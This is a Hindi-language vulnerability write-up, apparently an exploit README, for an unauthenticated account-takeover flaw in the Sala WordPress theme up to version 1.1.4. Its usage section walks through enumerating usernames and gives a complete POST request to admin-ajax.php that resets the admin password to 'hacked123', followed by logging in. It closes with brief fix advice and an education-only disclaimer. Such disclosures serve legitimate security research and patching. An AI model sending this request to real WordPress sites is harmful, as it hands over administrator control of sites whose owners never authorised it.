
Sala - Startup & SaaS WordPress Theme <= 1.1.4 - अनधिकृत विशेषाधिकार वृद्धि पासवर्ड रीसेट/खाता अधिग्रहण के माध्यम से
🔥 कमजोरी सारांश
WordPress थीम Sala संस्करण <= 1.1.4 एक अप्रमाणित विशेषाधिकार वृद्धि कमजोरी से ग्रस्त है। यह दोष अप्रमाणित हमलावरों को किसी भी उपयोगकर्ता — प्रशासकों सहित — का पासवर्ड रीसेट करने की अनुमति देता है, बिना अनुरोधकर्ता की पहचान सत्यापित किए, एक खुले AJAX एंडपॉइंट को सीधे आह्वान करके।
यह कमजोरी change_password_ajax फ़ंक्शन से उत्पन्न होती है जो wp_ajax_nopriv_ पर पंजीकृत है, जो बिना यह जांचे कि अनुरोध अधिकृत है या नहीं, किसी भी मान्य उपयोगकर्ता लॉगिन के लिए एक नया पासवर्ड सेट करता है।
🔍 प्रभावित थीम
🧪 शोषण सुविधाएँ
/wp-admin/admin-ajax.php?action=change_password_ajax🧠 शोधकर्ता
🚀 उपयोग
लक्ष्य WordPress साइट पर एक मान्य उपयोगकर्ता नाम पहचानें। आप यह जाँच कर सकते हैं:
/author/username)उपयोगकर्ता का पासवर्ड रीसेट करने के लिए निम्नलिखित POST अनुरोध तैयार करें:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
यदि सफल होता है, तो आप लक्षित उपयोगकर्ता के रूप में नए पासवर्ड (उपरोक्त उदाहरण में hacked123) का उपयोग करके लॉग इन कर सकते हैं।
/wp-login.php पर जाएँ और पहुँच सत्यापित करें।
🛠 सुधार अनुशंसाएँ
wp_ajax_nopriv_change_password_ajax हुक को हटाना या सुरक्षित करना चाहिए।is_user_logged_in() की जाँच करें और उपयोगकर्ता की पहचान सत्यापित करें।🔒 अस्वीकरण:
यह जानकारी केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान की गई है। सिस्टम का अनधिकृत शोषण अवैध और अनैतिक है।
📚 संदर्भ: